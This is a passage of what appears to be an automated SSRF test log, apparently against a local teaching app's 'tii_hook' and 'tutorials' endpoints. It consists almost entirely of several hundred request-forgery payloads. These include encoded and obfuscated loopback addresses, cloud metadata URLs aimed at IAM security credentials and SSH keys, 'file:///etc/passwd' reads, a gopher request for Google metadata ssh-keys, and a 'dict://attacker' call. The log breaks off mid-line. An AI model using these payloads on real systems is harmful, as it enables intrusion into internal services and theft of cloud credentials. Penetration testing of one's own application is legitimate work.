`http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=0` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_hook?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433` +- Testing: `http://localhost:4200/api/tii_hook?url=017700000001` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_hook?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tii_hook?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_hook?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tii_hook?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tii_hook?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_hook?url=0%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_hook?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tii_hook?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_hook?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_hook?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_hook?url=0` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tii_hook?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tii_hook?url=7F000001` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433` +- Testing: `http://localhost:4200/api/tii_hook?url=6425673729` +- Testing: `http://localhost:4200/api/tii_hook?url=127001` +- Testing: `http://localhost:4200/api/tii_hook?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_hook?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_hook?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_hook?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_hook?url=017700000001` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tii_hook?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tii_hook?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tii_hook?url=2852039166` +- Testing: `http://localhost:4200/api/tii_hook?url=7147006462` +- Testing: `http://localhost:4200/api/tii_hook?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tii_hook?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tii_hook?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tii_hook?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tii_hook?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tii_hook?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tii_hook?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tii_hook?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tii_hook?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tii_hook?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tii_hook?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tii_hook?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235521` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235777` +- Testing: `http://localhost:4200/api/tii_hook?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=instance-data` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tii_hook?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tii_hook?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_hook?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_hook?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_hook?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_hook?url=0%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tutorials +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8080%2Fadmin` +- Testing: 